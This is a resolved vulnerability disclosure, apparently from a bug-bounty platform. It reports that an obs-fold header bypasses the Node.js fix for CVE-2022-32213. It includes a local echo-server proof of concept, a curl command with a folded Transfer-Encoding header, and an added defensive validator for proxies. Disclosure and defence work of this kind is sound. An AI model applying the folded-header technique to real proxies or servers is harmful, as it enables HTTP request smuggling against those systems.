CVE-2022-32213 bypass via obs-fold mechanic
Medium
Node.js
Reported by
haxatron1
Vulnerability Details
Technical details and impact analysis
## Summary
The fix for CVE-2022-32213 can be bypassed using an obs-fold, which Node's HTTP parser supports.
## Proof-Of-Concept
`````
const http = require('http');

// Minimal server that echoes back the request headers as Node parsed them.
http.createServer((request, response) => {
  let body = [];
  request.on('error', (err) => {
    response.end("error while reading body: " + err);
  }).on('data', (chunk) => {
    // Collect body chunks as they arrive.
    body.push(chunk);
  }).on('end', () => {
    body = Buffer.concat(body).toString();
    response.on('error', (err) => {
      response.end("error while sending response: " + err);
    });
    // Show the header values after llhttp has processed any folding.
    response.end("Headers: " + JSON.stringify(request.headers));
  });
}).listen(5000);
`````
Send the obs-fold via curl:
`````
curl -vv -H $'Transfer-Encoding: chunked\r\n abc' --data "A" http://127.0.0.1:5000
`````
Observe that the server accepts the chunked request and incorrectly folds `abc` into the value of the Transfer-Encoding header. This is seen in the printed headers, where the value of "transfer-encoding" is "chunked abc".
`````
Headers: {"host":"127.0.0.1:5000","user-agent":"curl/7.83.1","accept":"*/*","transfer-encoding":"chunked abc","content-type":"application/x-www-form-urlencoded"}
`````
## Impact
If the Node.js HTTP module is used as a proxy, it incorrectly parses the Transfer-Encoding header as indicating a chunked request while folding the header, and hence forwards `Transfer-Encoding: chunked abc`, which is not a valid Transfer-Encoding header, to the downstream server. This can lead to HTTP request smuggling, as indicated by CVE-2022-32213.
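A defensive check that a Node.js proxy could apply before forwarding, given as an added example (it is not part of the original report and is not Node.js's own fix): it rejects a Transfer-Encoding value such as the `chunked abc` shown above. The function names and the strict policy (no coding parameters, reject when Content-Length is also present) are assumptions of this sketch, and `hasObsFold` is only usable where the raw header bytes are visible.

```javascript
// Added example: strict Transfer-Encoding gate for a proxy (hypothetical helper names).

// RFC 9110 "token" characters; a transfer coding name may contain only these.
const TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// obs-fold: a header line continued by a line break followed by SP or HTAB.
// rawHead must be the header section only (request line through the blank line).
function hasObsFold(rawHead) {
  return /\r?\n[ \t]/.test(rawHead);
}

// Validate one parsed Transfer-Encoding value, as found in request.headers.
function checkTransferEncoding(value) {
  const codings = String(value).split(',').map((c) => c.trim().toLowerCase());
  const bad = codings.find((c) => !TOKEN.test(c));
  if (bad !== undefined) return { ok: false, reason: `invalid coding "${bad}"` };
  // "chunked" must be present exactly once and must be the final coding.
  if (codings.indexOf('chunked') !== codings.length - 1) {
    return { ok: false, reason: 'chunked must appear once, as the final coding' };
  }
  return { ok: true, reason: 'ok' };
}

// Decide whether a request may be forwarded; headers is Node's lowercased map.
function forwardDecision(headers) {
  const te = headers['transfer-encoding'];
  if (te === undefined) return { forward: true, reason: 'no transfer-encoding' };
  if (headers['content-length'] !== undefined) {
    return { forward: false, reason: 'transfer-encoding with content-length' };
  }
  const res = checkTransferEncoding(te);
  return { forward: res.ok, reason: res.reason };
}

// Header map as printed by the proof-of-concept server in the report.
const REPORT_HEADERS = {
  host: '127.0.0.1:5000', 'user-agent': 'curl/7.83.1', accept: '*/*',
  'transfer-encoding': 'chunked abc',
  'content-type': 'application/x-www-form-urlencoded',
};

// Constructed raw header section mirroring the curl command in the report.
const RAW_FOLDED =
  'POST / HTTP/1.1\r\nHost: 127.0.0.1:5000\r\n' +
  'Transfer-Encoding: chunked\r\n abc\r\n\r\n';

console.log(forwardDecision(REPORT_HEADERS), hasObsFold(RAW_FOLDED));
```

In a proxy, a request for which `forwardDecision` returns `forward: false` would be answered with a 400 rather than relayed downstream.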
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2022-32213
UNKNOWN
The llhttp parser <v14.20.1, <v16.17.1 and <v18.9.1 in the http module in Node.js does not correctly parse and validate Transfer-Encoding headers and can lead to HTTP Request Smuggling (HRS).
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
HTTP Request Smuggling